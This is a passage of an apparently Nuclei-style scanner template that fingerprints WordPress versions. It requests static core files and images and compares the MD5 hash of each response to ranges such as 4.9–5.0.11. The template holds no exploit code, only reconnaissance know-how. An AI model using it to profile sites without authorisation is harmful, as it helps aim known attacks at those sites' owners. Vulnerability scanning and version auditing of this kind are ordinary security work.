type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"cc3c2444034208299c6df6cfc843e58a\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"2130932604d2718d1e9d11e800ab7e93\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"5c611eaec684f19737c160f5f01a485f\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"1378baafb8d7182238b30ec7c6e13022\" == md5(body))" - - type: dsl - name: 3.8 - 3.9.33 - dsl: - - "(\"a8081b20cf362f37400bea99ac2c844b\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"3e18e99953ef2c5dbe445865119db950\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"db7600d0c3cd3ee2578d361ff5c81d19\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"a2c8b624e5fad7d54a01eb87471d66b0\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"43b25764a6f643073ba0e4152c6365a6\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"639a08feb527f2c543772254b8d48925\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"fa60be36fa14ef21ddd1d2837a0791c8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-pointer.js" - matchers: - - type: dsl - name: 3.8 - 4.8.15 - dsl: - - "(\"35cb8b380bbd1f2eaa723ac49ba5f3f0\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"9fb67c2257a8111e496014c2d2f3a930\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"44006ca7f608bdd5a0a6445d84dfa14d\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"4a48a19acf10e63f33393a9d9909b3bd\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"35383aaf79e2b149c48a6acbc6c83809\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"7c3581af000bc58db4f8129ba6cd12b2\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"b295c27568ad8a9020144eed882b0067\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"491c51dd0c5bad0de219ce8bba0ada64\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-util.js" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"91c322750bc80f1cacfd4f991e65a415\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"705199da293ca7cfc6e98ea0b52774cb\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"b1f5d3eba80a1f93e0253bc74991fbb1\" == md5(body))" - - type: dsl - name: 3.8 - 4.0.32 - dsl: - - "(\"521d8ade2d01d0a2c99efa64416e11fb\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"84caa80dc10abf7a7ffd94c56cc38af1\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"3ec17cf08572d621367a0573351441aa\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"2c02aa97431dfcc81a82c8f83ab1cd3b\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"e09a8ad377e8a1ca3b8159a936c30906\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"4d904aced6e332244a94fd2bacd3ec9d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-preview-widgets.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"436093edec320c9f9da76cee03deb3ac\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"fdeaa6b3ee156fd6aef890e09059efb6\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"76d31132f6e296d08e381be0da448404\" == md5(body))" - - type: dsl - name: 4.0 - 4.4.24 - dsl: - - "(\"a01ebc7a7becb4597d71d379bcdab4be\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"c0e6272abe698aa445a21298fa79c358\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"8ff9fe7ca1dadd92d11ffa20b353c518\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"7a62917d11fdead57427817f23871ad5\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"7fa89954900ede4d882ee21e63c2cb15\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"79827dedd0eb15f0ee788ac363c326b6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/deprecated-media-rtl.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"071db78449e52b5a8e4f74881f45ca76\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"fddf44a35df34aa803d40aba646d7a6f\" == md5(body))" - - type: dsl - name: 4.2 - 4.4.24 - dsl: - - "(\"558fe352dfdab9790dab9710438af5a9\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"aec141ea70457e90d42dde854a175957\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"ef3b13a4cb7395ecba135bf389e7294f\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"10accf784a72c030297a52b5a33ce42f\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"48e00fdbf199890d49677720c9a98ea3\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"f50a36e92153387a5adc0ac424ce5d63\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"fd551bbabf0a178005d74d2d994220b4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/inline-edit-tax.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"ec5818c45238461cbce1fee187236490\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"0a60b48d0a2580ae43f1ed934f25e51a\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"bff3a6a1fcc82259876743865f72d438\" == md5(body))" - - type: dsl - name: 4.4.2 - 4.4.24 - dsl: - - "(\"ce627f76baed7a7eb06da71509b066f2\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.1 - dsl: - - "(\"dff660355620645c0c23307d49deff92\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"259a386f7971daa9c9b44d20004f1340\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"a920718b385e75e18193ee293ffdfd3c\" == md5(body))" - - type: dsl - name: 3.8 - 4.1.32 - dsl: - - "(\"169c038f805a493d8b5383670a02d89c\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"a0c85dc2666073624ce26e38d36b32f3\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"0a13ec480d142c7f380a97b6e2459736\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"52a3f5f1b0171e70baa94896642326f0\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"1e052a12b20c1dfabb85a4c0da26a1cc\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"f96182e442bef20e0a110399a1ea5d98\" == md5(body))" - - type: dsl - name: 2.9 - 3.1.4 - dsl: - - "(\"430b4ef17a75f9970241e7bb358faaae\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"8419d6590d1eacdd654695b963d1bc01\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"867a5f6f312d237c140168c4d4105c6d\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"75694df32dda3134f2ae3395701421f3\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"33d9729301a783c6561954a1451119a4\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"e8705cf154a08cc1027893e287a40ff4\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"be41ecebc432f794a5c5fdb1c629ee71\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/color-picker.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"05c7f6756aeac3f2cf7d276af6881826\" == md5(body))" - - type: dsl - name: 4.4 - 4.6.20 - dsl: - - "(\"8581b5c29da7d13a5f572d065a4ed66a\" == md5(body))" - - type: dsl - name: 4.1 - 4.3.25 - dsl: - - "(\"0e948ad7ea32644d4dcadc0f54fac1e3\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"a00c2e9159048b13c3a5dd4e831099ae\" == md5(body))" - - type: dsl - name: 3.8 - 3.9.33 - dsl: - - "(\"085caa20dbc9e9f7343bc0349227bedb\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"585ead88e437e19591a6d8c43de2df50\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"39fa620599ed3bcfcd86d0f08fb3e498\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"adfc5e0653304dd92664a01ce7083649\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"5a2d6a68911f4a366f4ea3ec0a04667e\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"9a87c880d0052fb9b2460d9036174588\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"5d18de7914a3e4c671455d63060dd2a5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/comment.js" - matchers: - - type: dsl - name: 4.3 - 4.8.15 - dsl: - - "(\"d9e3db00dcc6ef4d4c03ff455dcb9c55\" == md5(body))" - - type: dsl - name: 3.8 - 4.2.29 - dsl: - - "(\"a3fefb4998b3f534e144db4f235d0f03\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"5a208e90699083d393803d2d3ae55d4c\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"63b766663c76cec017bedd0bfbb726d0\" == md5(body))" - - type: dsl - name: 2.9 - 3.1.4 - dsl: - - "(\"7184dc411501524ca065630a3181c342\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"f58da1479570a8daae958114afe35ed9\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"9bfe7b668bcea89db5923f364be7d2d5\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"5695c2e76f3252ade7318e8fce327e6c\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"48e97502ef33e12eb022ad86d6d0bbb8\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"9d5033c1b96c8f3af0c09f42da8605c3\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"863d5773503d6d3b90e42f86f699802d\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"8d71ea9a92c5a75bf54c3826e9c070a9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/heartbeat.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"4714400d54b96a2c380b245300a5be5a\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"767daa50e889132aca060b188f0c4276\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"25e9e78d00555f2e724456104eff7af0\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"cc2012e2099931cd5db064122a44cb47\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"bdb3765e64c25f8ecae4774edc6768ed\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"4215343e6fb0baeb56e1670c323a2579\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"1fe14510fc9d98052c08bb3e3e7bdd8e\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"8548d05cee37b20058732f38c6613fe0\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"47c31105470a92578457104c096c0f91\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"38b33c94f0739e506b38ecbb9c62beb7\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"4b47f8e4c39036d98dc243d9a29946e2\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"396bf1e95fa7f2b2162b2c2b46b7a15a\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"db78872d0b60762436b3c1869bd76f68\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"0dffa5c13ef8fbc9dbf1cd71a1bc83f5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/tags-box.js" - matchers: - - type: dsl - name: 4.7.3 - 4.8.15 - dsl: - - "(\"caadae9faa6e901537e10b4292184771\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.2 - dsl: - - "(\"22409605b64b334cb93f77e246e35ff5\" == md5(body))" - - type: dsl - name: 4.4 - 4.6.20 - dsl: - - "(\"98130de261db524ce177b6de91aca164\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"74a49b1066cf04c0e5c92020e0ff23af\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"63756530c3d8b22327dcc0f15e71b8f9\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"1c5bb376ced2c7582e77eb388164871b\" == md5(body))" - - type: dsl - name: 5.2 - 5.3.6 - dsl: - - "(\"027bb2cd44a823dbd923b98a4f76a9c0\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"9444ec2274549c1f25b54059720b63af\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"d69960fa00e063d0d05e4779828ec42b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/image/plugin.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"fcd22e18e8ee0fcf99a822f19dac98d7\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"70e32e47fc0e319bf3558d21c537e983\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.3 - dsl: - - "(\"55065b4d900692d4308d97e79a0fa023\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"e8631e277ba2b821eb499489ffffd171\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"e0503423284ee602ddafaeb8dd074147\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"4ece365f92b620c8d64ef003230fd75c\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"4c4b675114bc33b728f43f7c6d642f6b\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"3a809b03fac37dfc31efdbe4899a90f4\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"f251faab04cf886a0c6633d8ee73b420\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"603056d1cc5154bb806457d0b4f5d4d3\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"251c380c1f052e4653a01b7888237d7d\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"92889d5f994a6864a8235e5d426c1e73\" == md5(body))" - - type: dsl - name: 5.1 - 5.2 - dsl: - - "(\"d48ef21012579e885df3ebd794e9499e\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"50bb8db93582d62b01ecb32d3f0f819e\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"2d94fa5a43e96cc2ad7dc4e88e900fea\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/image/plugin.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"a6e233c2e8e3903a0b08a9e6ae358d4f\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"7f7e4215ef62b1621a3479411d621a9b\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.3 - dsl: - - "(\"4584af9ba8c439604e4199168176a7b7\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"4a3db8fe2340caae4a61f43104257990\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"e60f8eb665759cface17e2662e085ecd\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"3fdb72c74a1d00f833cd12985c8964a7\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"d309316c1767ca923c2216d7348c2194\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"d8da74879ff4f0943f245f5dac52f10b\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"e808a23a61e91125d5e91a4403739692\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"1344c48d9051035a7b44e80213dfafa0\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"9ce288b4d2a341ae1eb77b53360e3c89\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"5756a9cf36da2f719f90edaeb64f73f7\" == md5(body))" - - type: dsl - name: 5.1 - 5.2 - dsl: - - "(\"594d170a70097bea65fca5776e691d0b\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"c2322e331f19d4449396c292b5d40343\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"8a42170c8d0a801b34d85caab530f03d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/xit-2x.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"8fb0729c541cbdc4609faf3f4ad02fc7\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"c5f831da18e837b9caf290a7866ddca6\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"d9a81fb5a5e21e6d74a5e81ce37b421e\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"9cd381c6753a40340d85e2c57a3c35c8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/xit.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"e5012902a358fbb96031acdcf048d7ca\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"c313ffcd0a1fe87b0a65dc2553e0ffdb\" == md5(body))" - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"a815dc7ad6c4175e95bc48f3ab6832e9\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"94ecab09335897c4ab392bef96366e7e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/down_arrow.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"65dcc85d3a75ff5776fbe3df0122b7e2\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"21ed67741d76d61ac1190caab379ada8\" == md5(body))" - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"7bbbc00f708a791dc4e674f9e21aa2ca\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"fcf88456be7e16c66ff6596e477e5f75\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/down_arrow-2x.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"a073b8a1ee9b2482017f3628da40a861\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"784a750a8b89c341821b90e0fcaba810\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"e52496d9eecd561f7c6d964acb0a5a73\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"f75deb11e71999ea4d859ec1fb8766dc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_question.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"d22775b2e32645907141f788c36d4e9d\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"d9c5f831b1159fb32757ec8735d67fe1\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"0518596a4eb94c32a2b2ed898bdc3549\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"b3df5b2d00d22715be1c1d9157b3a246\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_neutral.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"8a95dbfaa99809b0150687ae0cb45aed\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"7445588270b83d0154018a0f6158d779\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"4e8b7a51c7f60a2362a4f67fbbc937e7\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"1816d8e65601024d3348553121e19876\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_sad.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"1a273db3c34f6afb3fed75417ca5e7b6\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"793fa2ae7c21bd7db0803c27cc1c07a3\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"5a50535a06def9d01076772e5e9d235b\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"de4906780fe16fd4d3544d7ae6ed442d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_biggrin.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"c7597052fe2b16db307d6bd14e7b8c6b\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"0f9eafc5f35050bf3d79f38d88bf9d86\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"f970a6591668c625e4b9dbd3b7a450d7\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"fc4bb2f14a72a7bd3abf5d0e6b49d87c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_surprised.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"299972b5cdd1f1e0690dd95e4038bd87\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"db0d028bc820c41fff8fadcaee90d43d\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"ae735b5dd659dc4b3b0f249ce59bef79\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"55ec8bde2deeeb232bfef6b6b530e73f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_wink.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"d01a4f87055ac0fce8a66739d80434ba\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"6b687a134711bb0c7dd9b4ba5223d5ca\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"f058206bb8ff732dbe8e7aa10d74c9cd\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"653f1432aee113890f69a1179de0e3a5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_cool.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"96467eb5ae18dfa22ea1c0fa3e74380e\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"5841374462868c9a766738b5d5bce9fd\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"25c83ea511f206e88f214719dad9c88c\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"0a901c7fa06097ecf7e0cd69766a2edf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_confused.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"7fefa473594650055a36b9e3062c9a91\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"f4e73191a55161c8654310799bdc09bd\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"4affed1b55e5f73c9f0675ae7d0ad823\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"2f2309c617d3a27701772478eabe9359\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_smile.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"b2984729c3b6cdc07508b88b5c0a4d1e\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"bffd535b79d68b9a2fa2ba56dbd2ea56\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"9ee646ffab71107d1a11407be52f33a5\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"e3e033f32e291fc0328deadd70ebcef0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_mrgreen.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"fde9e44a8aae0e89bd527792b4779aca\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"a0c07b1e446da29dcb0ad9e19ff0bda4\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"54e8505227edae1e583cf2f9554abc3a\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"8d07245fc613bd75b2587c49251d7e24\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_idea.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"bdb3226d2568b8c1edf8f453b1e872e6\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"16c8ed37a3f6d76fdd9c080fe462f6a4\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"aaebc9c048367118ba65e1da46bc3e08\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"e5ecd43c5dd7ff5718330e1974de81e5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_razz.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"17cbe5cbade2b4ec3d85be4ac9409add\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"8ae3a1eb1b636b65585da3e12b225008\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"7aec68426aa06f01e2b1ac250e5aee62\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"395bde77b310909a44b341044dad41da\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_exclaim.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"5ce371458c1a2148595f5f3daf7b5fc8\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"3d11adad32e7bbc4d721156e3b003bd5\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"da86bbf377f97d06047aa781a582c52f\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"3a5cadb33e358d00720fc6cef47367d8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/icon_mad.gif" - matchers: - - type: dsl - name: 4.1 - 5.2.9 - dsl: - - "(\"d7be08b669651a63080cfe7b9004d330\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"2ad92f9ec41ddc8ee253c2409a027404\" == md5(body))" - - type: dsl - name: 2.0 - 3.8.35 - dsl: - - "(\"e4355c00894da1bd78341a6b54d20b56\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"561e9e210ecb0c400ffd63fb30e253b8\" == md5(body))" - - 